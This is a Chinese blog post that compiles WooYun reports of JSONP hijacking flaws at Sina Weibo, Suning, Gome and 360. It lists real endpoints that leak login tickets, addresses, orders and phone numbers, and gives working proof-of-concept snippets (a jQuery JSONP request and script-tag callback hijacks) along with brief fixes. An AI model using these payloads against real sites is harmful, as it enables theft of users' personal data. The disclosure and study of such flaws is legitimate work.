乌云jsonp案例
新浪微博之点击我的链接就登录你的微博(JSONP劫持)
生活处处有惊喜啊!逛逛wooyun都能捡到bug. 测试的时候没关burp,逛乌云的时候抓到一条url:
当returntype=TEXT时,返回的是jsonp格式:
将ticket,uid,昵称都返回来了。
|
|
登录状态访问:
|
---|
苏宁易购多接口问题可泄露用户姓名、地址、订单商品(jsonp案例)
苏宁易购基本所有jsonp接口都没有做防护,导致第三方网站可调用苏宁的jsonp接口获取到用户敏感信息
获取用户登陆状态的接口[是否登陆,会员编号] http://my.suning.com/authStatus?callback=jQuery17206592
获取用户个人信息的接口[加星的邮箱,用户级别,用户安全等级等] http://my.suning.com/memberInfoPageHead.do?callback=jQuery1720402
获取用户订单信息[下单时间,订单号,订单商品,订单金额,订单状态等] http://www.suning.com/emall/myShoppingOrderCmd?itemNum=3&callback=jQuery1720659299
获取用户地址簿接口[所有姓名、住址、加星手机号] http://my.suning.com/address.do?callback=jQuery172081
可能还有一些涉及用户隐私信息的接口我没发现,自查吧
POC |
测试方法: 下图是获取到的地址簿截图[地址簿是josnp接口返回html内容,然后js把html插入dom,所以我直接console.log了html内容] |
---|---|
修复方案 |
要么加token,要么验证refer |
国美在线多接口问题可泄露用户姓名、地址、电话等(json劫持实现)
多个jsonp接口无安全措施可泄露用户敏感信息
获取购物车商品接口 http://g.gome.com.cn/ec/homeus/support/add.jsp?callback=jQuery17&method=homeus.checkAllItem¶ms=%7B%22time%22%3A1433603338755%7D
获取当前登陆国美的用户接口 http://g.gome.com.cn/ec/homeus/navigation/gome/index/loginStyle.jsp?callback=logintop
获取用户待支付数、待评价数、优惠券数等信息的接口 http://g.gome.com.cn/ec/homeus/n/topMygome.jsp?callback=topMygome
获取用户地址簿的接口 http://member.gome.com.cn/myaccount/address/getSecondaryAddress?timer=1433606988720&callback=ckdata
可能还有其他涉及用户敏感信息的jsonp接口我没发现,自查吧
在其他网站引入jquery后在console输入如下内容即可验证是否存在
$.ajax({type:"get",url:"http://member.gome.com.cn/myaccount/address/getSecondaryAddress?timer=1433606988720",dataType:"jsonp",jsonp:"callback",jsonpCallback:"ckdata",success:function(json){console.log('下面是在百度域名下获取到国美的内容');console.log(json);console.log('上面是在百度域名下获取到国美的内容');}});
下面是证明截图
360某json hijacking(只要你登陆访问,我就知道你的用户名,邮箱)
<script>
function wooyun(v)
{
alert(v.username);
}
</script>
<script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>
总结:
利用常用poc:
<script>
function wooyun(a){
alert(a.uin);
}
</script>
<script src=http://xx.com/x?callback=wooyun></script>
json接口可随意请求,poc代码劫持点击
最新文章
- 利用gcc自带的功能-fstack-protector检测栈溢出及其实现
- selenium使用笔记(三)——元素定位
- 《如何在大学里脱颖而出(How to Win at College)》读书笔记
- HDFS的运行原理
- ArcGIS Server 开发之鹰眼地图的实现
- qt_文本编辑器实现_附带详细注释和源码下载
- 用Javascript实现回到顶部效果
- Linux VPS下SSH常用命令
- 升级到iis7 的web.config配置
- Bigcommerce:安装的出错解决方案
- 谈谈Ext JS的组件——布局的使用方法续一
- 通过Hack方式实现SDC中Stage配置联动刷新
- getparameter的使用
- 开发工具之Sublime编辑器
- yolov3 安装训练
- java学习--";==”和 equals
- [20180319]直接路径读特例12c.txt
- 最小二乘法的Java实现
- MongoDB 教程(一):了解 NoSQL
- 置换群和Burnside引理,Polya定理